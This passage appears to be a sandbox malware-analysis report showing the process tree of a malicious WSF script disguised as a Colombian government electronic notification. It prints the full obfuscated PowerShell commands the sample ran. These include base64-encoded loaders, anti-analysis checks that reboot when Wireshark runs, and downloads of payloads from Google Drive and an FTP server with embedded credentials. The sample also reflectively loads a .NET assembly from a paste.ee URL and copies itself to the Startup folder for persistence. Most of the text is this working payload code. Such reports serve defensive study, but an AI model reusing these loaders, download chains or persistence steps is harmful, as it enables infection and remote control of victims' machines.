'DAGIAZQ' + [char]66 + '3ACQAIAA9ACAAdg' + [char]66 + 'YAFUAVg' + [char]66 + 'SACQAOwAgACkAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAIAAsAEIAQQ' + [char]66 + 'RAFEATAAkACgAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQw' + [char]66 + 'rAHIAbw' + [char]66 + '3AHQAZQ' + [char]66 + 'OAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAC0Adw' + [char]66 + 'lAG4AIAA9ACAAcw' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAIAApACkAIAA0ADYAIAAsADQANgAgACwANAA2ACAALAA0ADYAIAAsADQANgAgACwANAA2ACAALAA2ADUAIAAsADUANQAgACwAMwA1ACAALAA5ADQAIAAsADkAOAAgACwAMAAwADEAIAAsADcAMQAxACAALAA5ADgAIAAsADIAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAIAA9ACAAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAOwAgACkAKQA5ADQALAA2ADEAMQAsADcAOQAsADQAMQAxACwAOAA5ACwAOAAxADEALAA3ADAAMQAsADkAOQAsADUAMQAxACwAMQAwADEALAAwADAAMQAoAF0AXQ' + [char]66 + 'bAHIAYQ' + [char]66 + 'oAGMAWwAgAG4AaQ' + [char]66 + 'vAGoALQAoACAAPQAgAEIAQQ' + [char]66 + 'RAFEATAAkADsAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvACcAIAArACAAJw' + [char]66 + 'yAGUAdA' + [char]66 + 'wAHkAcg' + [char]66 + 'jAHAAVQAvAHIAYgAuAG0Abw' + [char]66 + 'jAC4AdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAuAHAAdA' + [char]66 + 'mAEAAMQ' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC8ALwA6AHAAdA' + [char]66 + 'mACcAKAAgAD0AIA' + [char]66 + '6AG4AYw' + [char]66 + 'xAG4AJAA7AH0AIAAKAA0AOw' + [char]66 + '0AGkAeA' + [char]66 + 'lACAAIAAgACAAIAAgAAoADQA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'yAGUAdA' + [char]66 + '1AHAAbQ' + [char]66 + 'vAEMALQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'SAAoADQAgAHsAZQ' + [char]66 + 'zAGwAZQAKAA0ACgANAH0ACgANACAAIAAgACAAIAAgACAACgANACAAewApAGwAbA' + [char]66 + '1AE4AJAAgAHEAZQAtACAAKQ' + [char]66 + 'lAHUAbg' + [char]66 + 'pAHQAbg' + [char]66 + 'vAEMAeQ' + [char]66 + 'sAHQAbg' + [char]66 + 'lAGwAaQ' + [char]66 + 'TACAAYQ' + [char]66 + 'lAC0AIAAnAGUAeg' + [char]66 + '5AGwAYQ' + [char]66 + 'uAGEAJwAsACcAUw' + [char]66 + 'OAEQAZQ' + [char]66 + '0AGEAcA' + [char]66 + 'hACcALAAnAGsAcg' + [char]66 + 'hAGgAcw' + [char]66 + 'lAHIAaQ' + [char]66 + 'XACcAIA' + [char]66 + 'zAHMAZQ' + [char]66 + 'jAG8Acg' + [char]66 + 'wAC0AdA' + [char]66 + 'lAGcAKAAoAGYAaQA7ACAAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwAgAH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAFoAdw' + [char]66 + 'mAHcAVQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgAD0AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAFoAdw' + [char]66 + 'mAHcAVQAkADsAKQAgACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgACwAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHEAdw' + [char]66 + 'qAHYAegAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7AH0AOwAgACkAJw' + [char]66 + '3ADUAMA' + [char]66 + 'aADEAOA' + [char]66 + '1AGMANw' + [char]66 + 'aAE0ASwA4ADgAZw' + [char]66 + 'lAHQAaA' + [char]66 + 'qAG4AQQ' + [char]66 + 'wAGoAMQ' + [char]66 + 'MAEIALQA0AHkASA' + [char]66 + 'hAGEAMQAnACAAKwAgAHYAZg' + [char]66 + 'xAG0AbgAkACgAIAA9ACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnAFYARQ' + [char]66 + 'TAGQAag' + [char]66 + '3AFUAOQA1AFIALQ' + [char]66 + 'XAHMAWQ' + [char]66 + '1AFoATA' + [char]66 + 'pAHcAcg' + [char]66 + 'iADUAWQ' + [char]66 + 'OAFEALQ' + [char]66 + 'IAGoAcg' + [char]66 + 'iADIAcAAxACcAIAArACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKAAgAD0AIA' + [char]66 + '2AGYAcQ' + [char]66 + 'tAG4AJA' + [char]66 + '7ACAAKQAgAGkAZg' + [char]66 + 'tAHUAWAAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAAaQ' + [char]66 + 'mAG0AdQ' + [char]66 + 'YACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHYAZg' + [char]66 + 'xAG0AbgAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJA' + [char]66 + '7ACAAKQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAOwA=';$nymcr = $nymcr.replace('уЦϚ' , 'B') ;;$cpdfb = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nymcr ) ); $cpdfb = $cpdfb[-1..-$cpdfb.Length] -join '';$cpdfb = $cpdfb.replace('%XRqhI%','C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF');powershell $cpdfb
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2028
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $cIOeC = $host.Version.Major.Equals(2) ;if ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$nmqfv = 'https://drive.google.com/uc?export=download&id=';$Xumfi = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $Xumfi ) {$nmqfv = ($nmqfv + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$nmqfv = ($nmqfv + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$zvjwq = (New-Object Net.WebClient);$zvjwq.Encoding = [System.Text.Encoding]::UTF8;$zvjwq.DownloadFile($nmqfv, ($HzOMj + '\Upwin.msu') );$UwfwZ = ('C:\Users\' + [Environment]::UserName );JCCGX = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF' -Destination ( $UwfwZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$nqcnz = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$LQQAB = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($LQQAB, $lllGq) ;$RVUXv = $webClient.DownloadString( $nqcnz ) ;$RVUXv | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $JukpV ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$aeDwU = '$sNwoM = ''C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF'' ; $ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$aeDwU += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$aeDwU += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$aeDwU += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$aeDwU += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''0/zpfHt/d/ee.etsap//:sptth'' , $sNwoM , ''DDDMSBuild'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$aeDwU | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
        5⤵
        Drops startup file
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1940
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe JCCGX /quiet /norestart
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1052
        
        C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" JCCGX /quiet /norestart
        7⤵
        Drops file in Windows directory
        
        PID:1104
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2316
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF"
    3⤵
    - Blocklisted process makes network request
    PID:2036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nymcr = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAHoAVw' + [char]66 + 'XAEIAVgAkADsAJwA7ACkAIAApACAAIAAnACcAZA' + [char]66 + 'sAGkAdQ' + [char]66 + 'CAFMATQ' + [char]66 + 'EAEQARAAnACcAIAAgACwAIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAgACwAIAAnACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHAAYQ' + [char]66 + 'zAHQAZQAuAGUAZQAvAGQALw' + [char]66 + '0AEgAZg' + [char]66 + 'wAHoALwAwACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bACcAIAA9ACsAIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAJwA7ACkAOA' + [char]66 + 'GAFQAVQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAJwAgACsAIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgACsAIAAnACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACgAIAA9ACAARw' + [char]66 + 'lAGEAeQ' + [char]66 + 'yACQAIAA7ACAAJwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAnACAAPQAgAE0Abw' + [char]66 + '3AE4AcwAkACcAIAAgAD0AIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAE4AbA' + [char]66 + 'yAGgAUAAkACAAPQAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAIAAoACAAPQAgACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAOwAgADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4ATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AIAA9ACAATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgACkAJw' + [char]66 + '0AHgAdAAuADIAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGwARw' + [char]66 + 'mAFQAUwAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACcAOA' + [char]66 + 'GAFQAVQAnACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIA' + [char]66 + 'WAHAAaw' + [char]66 + '1AEoAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHYAWA' + [char]66 + 'VAFYAUgAkADsAIAApACAAeg' + [char]66 + 'uAGMAcQ' + [char]66 + 'uACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + '3ACQAIAA9ACAAdg' + [char]66 + 'YAFUAVg' + [char]66 + 'SACQAOwAgACkAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAIAAsAEIAQQ' + [char]66 + 'RAFEATAAkACgAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQw' + [char]66 + 'rAHIAbw' + [char]66 + '3AHQAZQ' + [char]66 + 'OAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAC0Adw' + [char]66 + 'lAG4AIAA9ACAAcw' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 